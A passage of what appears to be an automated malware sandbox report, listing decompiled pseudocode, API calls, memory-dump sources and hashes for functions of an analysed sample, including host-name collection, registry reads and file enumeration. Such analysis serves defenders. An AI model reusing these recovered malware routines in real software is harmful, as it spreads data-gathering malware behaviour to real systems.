					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x02c96bcb
0x02c96bcf
0x02c96bd1
0x02c96bd2
0x02c96bda
0x02c96bda
0x02c96bde
0x00000000
0x00000000
0x02c96bd5
0x02c96bd6
0x02c96bd9
0x02c96bd9
0x02c96be6
0x02c96beb
0x02c96bf1
0x02c96bf9
0x02c96bff
0x02c96c01
0x02c96c06
0x02c96c0a
0x02c96c0c
0x02c96c0f
0x02c96c16
0x02c96c16
0x02c96c20
0x02c96c23
0x02c96c24
0x02c96c26
0x02c96c32
0x02c96c32
0x02c96c3f

APIs

StrChrA.SHLWAPI(?,00000020,00000000,051495AC,?,02C95D85,?,02C98097,051495AC,?,02C95D85), ref: 02C96BDA
StrTrimA.KERNELBASE(?,02C9C2A4,00000002,?,02C95D85,?,02C98097,051495AC,?,02C95D85), ref: 02C96BF9
StrChrA.SHLWAPI(?,00000020,?,02C95D85,?,02C98097,051495AC,?,02C95D85), ref: 02C96C04
StrTrimA.SHLWAPI(00000001,02C9C2A4,?,02C95D85,?,02C98097,051495AC,?,02C95D85), ref: 02C96C16

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 9a683042baa37b6db425b4bff56dcfc6da8cbb3a9716a36835d241ffadf29b5d
Instruction ID: 2a180df52dd67fa144fd434c60762128fcf3948e72937ede36945be59a6090d8
Opcode Fuzzy Hash: 9a683042baa37b6db425b4bff56dcfc6da8cbb3a9716a36835d241ffadf29b5d
Instruction Fuzzy Hash: 1C0128726017259FD6209E56CC4CF27BF9CEF89AA4F210519F842DB280DB60CC01D6B4

Uniqueness

Uniqueness Score: -1.00%

Function 02C9450C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C9450C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E02C91546(0, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E02C968D2(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E02C94413(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x2c9d238, 0, _t25);
				}
				return _t22;
			}

0x02c9450c
0x02c9451f
0x02c94523
0x02c9457e
0x02c94525
0x02c9452c
0x02c94534
0x02c94537
0x02c9453c
0x02c94540
0x02c94546
0x02c9454e
0x02c94551
0x02c94569
0x02c94569
0x02c94574
0x02c94574
0x02c94585

APIs

Part of subcall function 02C91546: lstrlen.KERNEL32(?,00000000,02C9D330,00000001,02C967F7,02C9D00C,02C9D00C,00000000,00000005,00000000,00000000,?,?,?,02C941AA,02C95D90), ref: 02C9154F
Part of subcall function 02C91546: mbstowcs.NTDLL ref: 02C91576
Part of subcall function 02C91546: memset.NTDLL ref: 02C91588

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,0514937C), ref: 02C94546
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,0514937C), ref: 02C94574

Strings

Uxt, xrefs: 02C94574

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uxt
API String ID: 1500278894-1536154274
Opcode ID: e7432c4e8bbaa38a3179132aea0751c419acdc50f07a0f15e7c9d82ee4731687
Instruction ID: 4bcb2a8528262c9be9cc062128b975894cd3dc80755cf0205d0cf702696f17a8
Opcode Fuzzy Hash: e7432c4e8bbaa38a3179132aea0751c419acdc50f07a0f15e7c9d82ee4731687
Instruction Fuzzy Hash: 4401D432600209BBDF215FA8DC48F9B7BB9EF88704F400426FA009A050D771CA25DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02C9620F, Relevance: 3.9, APIs: 3, Instructions: 154
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E02C9620F(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t67;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x2c9d2a4; // 0x24aa5a8
				_t5 = _t40 + 0x2c9ee40; // 0x410025
				_t85 = E02C9662A(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E02C9A5FA(_v16);
					goto L24;
				}
				if(E02C9A762(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E02C91546(0,  *0x2c9d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x2c9d2a4; // 0x24aa5a8
					_t11 = _t52 + 0x2c9e81a; // 0x65696c43
					_t87 = E02C91546(0, _t11);
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E02C95AF6(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E02C9A5FA(_t87);
					}
					if(_t80 != 0) {
						L17:
						E02C9A5FA(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E02C98371(_t86);
						}
						goto L22;
					} else {
						if(( *0x2c9d260 & 0x00000001) == 0) {
							L14:
							E02C943DF(_v84, _v88,  *0x2c9d270, 0);
							_t80 = E02C98B3E(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E02C98C8E( &_v40, 0);
							}
							E02C9A5FA(_v88);
							goto L17;
						}
						_t67 =  *0x2c9d2a4; // 0x24aa5a8
						_t18 = _t67 + 0x2c9e823; // 0x65696c43
						_t89 = E02C91546(0, _t18);
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E02C95AF6(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E02C9A5FA(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x02c96221
0x02c96224
0x02c9622b
0x02c96231
0x02c96232
0x02c96233
0x02c96234
0x02c96235
0x02c96236
0x02c9623e
0x02c9624a
0x02c9624c
0x02c96251
0x02c9639f
0x02c963a2
0x02c963a6
0x02c963a6
0x02c96263
0x02c9626b
0x02c96392
0x02c96393
0x02c96396
0x00000000
0x02c96396
0x02c9627d
0x02c9627f
0x02c9627f
0x02c9628a
0x02c9628f
0x02c96294
0x02c96381
0x00000000
0x02c9629a
0x02c9629a
0x02c9629f
0x02c962ad
0x02c962b6
0x02c962d9
0x02c962b8
0x02c962ce
0x02c962d0
0x02c962d0
0x02c962dc
0x02c96375
0x02c96378
0x02c96382
0x02c96382
0x02c96387
0x02c96389
0x02c96389
0x00000000
0x02c962e2
0x02c962e9
0x02c9632a
0x02c96339
0x02c9634f
0x02c96353
0x02c96358
0x02c9635e
0x02c9636b
0x02c9636b
0x02c96370
0x00000000
0x02c96370
0x02c962eb
0x02c962f0
0x02c962fe
0x02c96302
0x02c96325
0x02c96304
0x02c9631a
0x02c9631c
0x02c9631c
0x02c96328
0x00000000
0x00000000
0x00000000
0x00000000
0x02c96328
0x02c962dc

APIs

memset.NTDLL ref: 02C96224

Part of subcall function 02C9662A: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,02C9624A,00410025,00000005,?,00000000), ref: 02C9663B
Part of subcall function 02C9662A: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 02C96658

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02C96258
StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 02C96263

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: 36b838843ba7caa9380157fe53bf0bfd09c73c480520f5d21100fb2cbd30838f
Instruction ID: 14640a920357b54dae5fe28186acbe85c2bc409fa8460d373791738c32a04db7
Opcode Fuzzy Hash: 36b838843ba7caa9380157fe53bf0bfd09c73c480520f5d21100fb2cbd30838f
Instruction Fuzzy Hash: 10415E72900619AFDF11EFE4CD88ADE7BBDBF08344B154526EA0AE7140D7719E149B90

Uniqueness

Uniqueness Score: -1.00%

Function 02C959F9, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02C959F9(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02C9907D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2c9d2a4; // 0x24aa5a8
						_t20 = _t68 + 0x2c9e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02C9666E(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02c959ff
0x02c95a02
0x02c95a12
0x02c95a1b
0x02c95a1f
0x02c95aed
0x02c95af3
0x02c95af3
0x02c95a39
0x02c95a3e
0x02c95a42
0x02c95a48
0x02c95a4d
0x02c95a54
0x02c95a63
0x02c95a63
0x02c95a67
0x02c95a69
0x02c95a75
0x02c95a80
0x02c95a8b
0x02c95a8f
0x02c95a99
0x02c95a9d
0x02c95a9f
0x02c95aa4
0x02c95aab
0x02c95abb
0x02c95abb
0x02c95aa4
0x02c95a9d
0x02c95abd
0x02c95ac2
0x02c95ac7
0x02c95ac7
0x02c95aca
0x02c95ad3
0x02c95ad8
0x02c95ad8
0x02c95add
0x02c95ae2
0x02c95ae2
0x02c95add
0x02c95a67
0x02c95ae4
0x02c95aea
0x00000000

APIs

Part of subcall function 02C9907D: SysAllocString.OLEAUT32(80000002), ref: 02C990DA
Part of subcall function 02C9907D: SysFreeString.OLEAUT32(00000000), ref: 02C99140

SysFreeString.OLEAUT32(?), ref: 02C95AD8
SysFreeString.OLEAUT32(02C94010), ref: 02C95AE2

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: af4d0a4c6f35f73828270e15b2431c7cdbe276bf8466fcdbcb0766a93d4efafb
Instruction ID: 1f8c6e268a048c8e1c047a125505e974047601041b7aee3f35764a4fa4010276
Opcode Fuzzy Hash: af4d0a4c6f35f73828270e15b2431c7cdbe276bf8466fcdbcb0766a93d4efafb
Instruction Fuzzy Hash: 5B314A72900119AFCF12DF64C888CABBB7AFFC97847544658F8159B210E731DD55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C967C4, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E02C967C4(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x2c9d330;
				E02C99186();
				while(1) {
					_t8 = E02C94C3B(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E02C91546(_t14);
					if(_t15 == 0) {
						HeapFree( *0x2c9d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E02C99186();
					if(_t19 != 0) {
						_t22 =  *0x2c9d338; // 0x5149b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x02c967cc
0x02c967d0
0x02c967d1
0x02c967d2
0x02c967d7
0x02c967dc
0x02c967e3
0x02c967ea
0x00000000
0x00000000
0x02c967ec
0x02c967f1
0x02c967f2
0x02c967f9
0x02c96813
0x00000000
0x02c967fb
0x02c967fb
0x02c967fd
0x02c96800
0x02c96804
0x00000000
0x00000000
0x02c96806
0x02c96804
0x02c9681b
0x02c9681b
0x02c9681d
0x02c96824
0x02c96826
0x02c9682c
0x02c96833
0x02c96843
0x02c9683b
0x02c9683e
0x02c9683e
0x02c96846
0x02c96846
0x02c9684f
0x02c9684f
0x02c96819
0x00000000

APIs

Part of subcall function 02C99186: GetProcAddress.KERNEL32(36776F57,02C967DC), ref: 02C991A1

Part of subcall function 02C94C3B: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 02C94C66
Part of subcall function 02C94C3B: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02C94C88
Part of subcall function 02C94C3B: memset.NTDLL ref: 02C94CA2
Part of subcall function 02C94C3B: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02C94CE0
Part of subcall function 02C94C3B: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C94CF4
Part of subcall function 02C94C3B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02C94D0B
Part of subcall function 02C94C3B: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02C94D17
Part of subcall function 02C94C3B: lstrcat.KERNEL32(?,642E2A5C), ref: 02C94D58
Part of subcall function 02C94C3B: FindFirstFileA.KERNELBASE(?,?), ref: 02C94D6E

Part of subcall function 02C91546: lstrlen.KERNEL32(?,00000000,02C9D330,00000001,02C967F7,02C9D00C,02C9D00C,00000000,00000005,00000000,00000000,?,?,?,02C941AA,02C95D90), ref: 02C9154F
Part of subcall function 02C91546: mbstowcs.NTDLL ref: 02C91576
Part of subcall function 02C91546: memset.NTDLL ref: 02C91588

HeapFree.KERNEL32(00000000,02C9D00C,02C9D00C,02C9D00C,00000000,00000005,00000000,00000000,?,?,?,02C941AA,02C95D90,02C9D00C,?,02C95D90), ref: 02C96813

Strings

Uxt, xrefs: 02C96813

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID: Uxt
API String ID: 983081259-1536154274
Opcode ID: dbe005f186a82263a96ab248c3ff7c5cdcfb3736a0a2b8c256f373233656cc0c
Instruction ID: dbc2f061de6382a1b10ccddb68d1c476a8ef9e459b00df64d44354181abe91d4
Opcode Fuzzy Hash: dbe005f186a82263a96ab248c3ff7c5cdcfb3736a0a2b8c256f373233656cc0c
Instruction Fuzzy Hash: 88012D75600104AEEF105FE7CD8CBAA77AEEF85754F600539F945D6090D6708E81AF64

Uniqueness

Uniqueness Score: -1.00%

Function 02C94B9D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C94B9D(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02C95AF6(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2c9d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02C9497C(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x02c94b9d
0x02c94ba5
0x02c94bbc
0x02c94bd7
0x02c94bdb
0x02c94be0
0x02c94be2
0x02c94bf4
0x02c94c00
0x02c94be4
0x02c94be4
0x02c94be9
0x02c94bee
0x02c94bee
0x02c94be2
0x02c94c06
0x02c94c0a
0x02c94c0a
0x02c94bb1
0x02c94bb6
0x02c94bba
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 02C9497C: SysFreeString.OLEAUT32(00000000), ref: 02C949DF

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,02C957D8,?,004F0053,05149388,00000000,?), ref: 02C94C00

Strings

Uxt, xrefs: 02C94C00

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID: Uxt
API String ID: 3806048269-1536154274
Opcode ID: fdfdfd5e418a862a0803cc6b054d06a8977b0de823ad2fc68e7f75e411433503
Instruction ID: 8ccc55a394a536bab7579c9aac251dc39600b60a4a379ec2629fa23cbc18ba09
Opcode Fuzzy Hash: fdfdfd5e418a862a0803cc6b054d06a8977b0de823ad2fc68e7f75e411433503
Instruction Fuzzy Hash: 72012C72500919BFCF369F58CC08FAA7B65EF48790F048118FE059A120D731CA61DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C96517, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(02C92F48), ref: 02C96530

Part of subcall function 02C959F9: SysFreeString.OLEAUT32(?), ref: 02C95AD8

SysFreeString.OLEAUT32(00000000), ref: 02C96571

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0ed7a9b69a24b15e3a0542b8a823bba70e330104b92f3fd9736b46510b2ecc9b
Instruction ID: 12b2f2287db7b0a287efaff1c5bb6ac73094c125941f2e53942eaa8599c267d4
Opcode Fuzzy Hash: 0ed7a9b69a24b15e3a0542b8a823bba70e330104b92f3fd9736b46510b2ecc9b
Instruction Fuzzy Hash: D601623690010ABFDF01DFA9D90899F7BB9EF48710B014522FA09E7120D7309E25CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02C93F0E, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02C93F0E(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02C97E20(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02C9A5FA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02c93f13
0x02c93f1e
0x02c93f20
0x02c93f26
0x02c93f28
0x02c93f2d
0x02c93f36
0x02c93f3a
0x02c93f43
0x02c93f47
0x02c93f56
0x02c93f49
0x02c93f4a
0x02c93f4f
0x02c93f4f
0x02c93f47
0x02c93f3a
0x02c93f5f

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,02C929CE,747DF710,00000000,?,?,02C929CE), ref: 02C93F26

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

GetComputerNameExA.KERNELBASE(00000003,00000000,02C929CE,02C929CF,?,?,02C929CE), ref: 02C93F43

Part of subcall function 02C9A5FA: HeapFree.KERNEL32(00000000,00000000,02C981B4,00000000,?,?,00000000), ref: 02C9A606

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: c2add449fcfa06e3c123a34bf60264a58249bd4ad5726e72ee1ec58cc38c7904
Instruction ID: db9a0c32d001d582bbf2a09bc5732a3913154be0ede11ff96a4d3d3131d04f62
Opcode Fuzzy Hash: c2add449fcfa06e3c123a34bf60264a58249bd4ad5726e72ee1ec58cc38c7904
Instruction Fuzzy Hash: 88F0B432600186BAEF11D69A9C08FAF7BBDDBC4700F1000D5E908D7140EB70DF059671

Uniqueness

Uniqueness Score: -1.00%

Function 02C96456, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2c9d23c) == 0) {
						E02C9469F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2c9d23c) == 1) {
						_t10 = E02C9523A(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x02c9645d
0x02c9645e
0x02c96461
0x02c96493
0x02c96495
0x02c96495
0x02c96463
0x02c96464
0x02c96479
0x02c96480
0x02c96482
0x02c96482
0x02c96480
0x02c96464
0x02c9649d

APIs

InterlockedIncrement.KERNEL32(02C9D23C), ref: 02C9646B

Part of subcall function 02C9523A: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02C9647E,?), ref: 02C9524D

InterlockedDecrement.KERNEL32(02C9D23C), ref: 02C9648B

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 8ca7ac84fe922d57488038f8e6877eb6c4df59eec7acb9052c09a528eb0666bb
Instruction ID: bd9f7bf20b0f266ce075d5ef94816f73d922dc12d1ac62837184a03a8e465173
Opcode Fuzzy Hash: 8ca7ac84fe922d57488038f8e6877eb6c4df59eec7acb9052c09a528eb0666bb
Instruction Fuzzy Hash: 6EE0DF382C4221A3AF25A7E48C0C75AA709AB92F89F218926E487E0088C320DA909691

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BA760, Relevance: 1.8, APIs: 1, Instructions: 255memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E1B6ED0: RtlEnterCriticalSection.NTDLL(?), ref: 6E1B6EDF

RtlAllocateHeap.NTDLL(6E257728,00000000,?), ref: 6E1BA8EF

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: AllocateCriticalEnterHeapSection
String ID:
API String ID: 8947104-0
Opcode ID: ff91b4454bbcd075221a7654b99581fb9cddd5cc0ce053695d3002a942470e6c
Instruction ID: f2b5579d3025ac6c6388df9d3f8602974b58e3f5ce7164b5099777eb5f8d70a0
Opcode Fuzzy Hash: ff91b4454bbcd075221a7654b99581fb9cddd5cc0ce053695d3002a942470e6c
Instruction Fuzzy Hash: 30B18DB4A00208AFDF04CF98C994BDE7BB6FB59314F208519E915AB3C0D775A981DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DC530, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4615f0dd01aa9a914d8776b03a6a2a3862c829925ef0405e6f5b71b66aa82bdb
Instruction ID: bd5176e08a5090a66c23a2ff844726044691bc7318354afcadb440e436e80ad6
Opcode Fuzzy Hash: 4615f0dd01aa9a914d8776b03a6a2a3862c829925ef0405e6f5b71b66aa82bdb
